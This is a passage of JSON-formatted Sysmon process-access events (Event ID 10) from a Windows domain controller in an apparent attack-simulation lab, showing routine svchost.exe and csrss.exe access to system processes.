05:46:46.797","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010766A0300}","TargetProcessId":"3852","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1698,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1699,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1700,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1701,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1702,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1703,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1704,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1705,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\n